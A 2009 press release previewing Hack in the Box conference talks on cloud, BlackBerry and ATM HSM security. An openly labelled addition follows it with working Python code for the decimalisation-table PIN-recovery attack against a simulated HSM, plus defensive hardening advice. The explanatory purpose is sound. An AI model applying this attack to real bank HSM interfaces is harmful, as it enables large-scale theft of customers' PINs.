KUALA LUMPUR, 5 OCTOBER 2009 – Cloud clobbering, ATM hacking and BlackBerry spying are some of the themes at the 7th Hack in The Box Security Conference (HITBSecConf) in Malaysia.
Conference organisers said some of the most prominent mainstream and underground ICT security experts are in Kuala Lumpur on October 7-8 to discuss a range of hardware and software security topics.
Sensepost technical director Haroon Meer said that his talk, Clobbering the Cloud, examines the new technologies behind cloud computing and the risks and vulnerabilities of the systems built on them.
ZenConsultant head of research and development, Sheran Gunasekera, said that while the BlackBerry has always enjoyed a reputation for being a secure platform, without a single vulnerability reported on it for the past two years, he will show how the handhelds can be compromised to sniff users' email (and optionally instant messages, web browsing traffic and SMS messages).
Hack In The Box (HITB) is the owner and organiser of HITBSecConf, the largest network security conference in Asia and the Middle East. HITBSecConf has been held in Malaysia since 2003 and is endorsed by the Malaysian Communications and Multimedia Commission (MCMC), the Malaysian International Chamber of Commerce and Industry (MICCI), the Malaysian National Computer Confederation (MNCC) and the Malaysian Multimedia Development Corporation (MDeC).
ATM vulnerabilities
Other speakers include ENCODE Middle East managing director Dimitrios Petropoulos, who said: “The cornerstone of every bank’s ATM network is a number of HSMs [Hardware Security Modules], which securely create, store, verify, translate and ultimately destroy the verification PINs [Personal Identification Numbers] associated with each debit/credit card.”
“However, the protocols used and the APIs [Application Programming Interfaces] exposed by the HSMs are known to suffer from a number of inherent vulnerabilities that open the system to a wide range of attacks, from the trivial to the highly complex, all of which lead to the same result—the unauthorised disclosure of large numbers of client PINs,” said Petropoulos, adding that he would give examples of some successful recent attacks perpetrated using the described vulnerabilities.
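The article does not name any specific HSM API attack. The following is an added example, not part of the press release or of Petropoulos's talk, showing the best-known published one: the decimalisation-table attack on IBM 3624-style PIN verification (Bond and Zieliński, 2003). In that scheme the HSM derives a "natural PIN" from the account number under a secret key, maps the hex digits to decimals through a caller-supplied decimalisation table, adds a per-card offset, and compares the result with the PIN the customer typed. Because the caller controls the table and the offset, an attacker who can issue verify calls (a corrupt bank insider, or malware on a switch) can recover the PIN in well under a hundred calls without ever learning the key. The HSM here is a toy simulation (a keyed hash stands in for the DES operation), and the key, account number and offset are constructed values.

```python
"""Toy IBM 3624 PIN verification and the decimalisation-table attack against it.

Added illustrative example; the HSM, key, PAN and offset are all constructed.
"""
import hashlib

# The standard table: hex digit 0-F -> decimal digit. A sane HSM would only
# ever be handed this table (or a small set of approved ones).
STANDARD_DECTAB = "0123456789012345"


class ToyPinHsm:
    """Simulates the PIN-verification API of a 3624-style HSM."""

    def __init__(self, pin_verification_key: bytes):
        self._key = pin_verification_key  # never leaves the module

    def _natural_hex(self, pan: str) -> str:
        # Real hardware: first 4 hex digits of DES(PVK, validation data).
        # Toy stand-in: keyed SHA-256 truncated to 4 hex digits.
        return hashlib.sha256(self._key + pan.encode()).hexdigest()[:4]

    def verify_pin(self, pan: str, dectab: str, offset: str, trial_pin: str) -> bool:
        """Return True iff trial_pin == decimalise(natural) + offset (digit-wise mod 10).

        The attack works precisely because dectab and offset are caller-supplied.
        """
        natural = [int(dectab[int(h, 16)]) for h in self._natural_hex(pan)]
        expected = "".join(str((n + int(o)) % 10) for n, o in zip(natural, offset))
        return expected == trial_pin


def decimalisation_attack(verify, pan: str, card_offset: str):
    """Recover the customer PIN using only verify(pan, dectab, offset, trial) -> bool.

    Returns (pin, number_of_api_calls). The attacker knows the PAN and the card's
    offset (both are on the card / in the bank's database) but not the HSM key.
    """
    calls = 0

    def single_one_table(i: int) -> str:
        # Maps hex digit i to 1 and every other hex digit to 0.
        return "".join("1" if j == i else "0" for j in range(16))

    # Step 1: which hex digits occur in the 4-digit natural hex string?
    # With table D_i and zero offset, a trial of 0000 verifies iff digit i is absent.
    present = []
    for i in range(16):
        calls += 1
        if not verify(pan, single_one_table(i), "0000", "0000"):
            present.append(i)

    # Step 2: for each present digit, find its position(s) by trying trial PINs
    # with 1s in every non-empty subset of positions (at most 15 calls per digit).
    hex_at_position = [None] * 4
    for i in present:
        for mask in range(1, 16):
            trial = "".join("1" if mask & (1 << p) else "0" for p in range(4))
            calls += 1
            if verify(pan, single_one_table(i), "0000", trial):
                for p in range(4):
                    if mask & (1 << p):
                        hex_at_position[p] = i
                break

    # Step 3: rebuild the natural PIN under the real table and add the real offset.
    natural = [int(STANDARD_DECTAB[h]) for h in hex_at_position]
    pin = "".join(str((n + int(o)) % 10) for n, o in zip(natural, card_offset))
    return pin, calls


# Constructed demo values (not real card data).
DEMO_KEY = b"constructed-toy-pin-verification-key"
DEMO_PAN = "4000123412341234"
DEMO_OFFSET = "1234"


def run_demo():
    """Run the attack against the toy HSM; returns (pin, calls, verified)."""
    hsm = ToyPinHsm(DEMO_KEY)
    pin, calls = decimalisation_attack(hsm.verify_pin, DEMO_PAN, DEMO_OFFSET)
    # Confirm the recovered PIN is what the bank's own (standard-table) check accepts.
    verified = hsm.verify_pin(DEMO_PAN, STANDARD_DECTAB, DEMO_OFFSET, pin)
    return pin, calls, verified


if __name__ == "__main__":
    pin, calls, ok = run_demo()
    print(f"recovered PIN {pin} in {calls} API calls; bank verification: {ok}")
```

The point for a defender is that the key was never at risk; the API was. The usual hardening is to refuse any decimalisation table other than the approved one(s), bind offset and table to the card record rather than the caller, and rate-limit and alert on verify failures per PAN, since the attack needs a burst of failed verifications against one account.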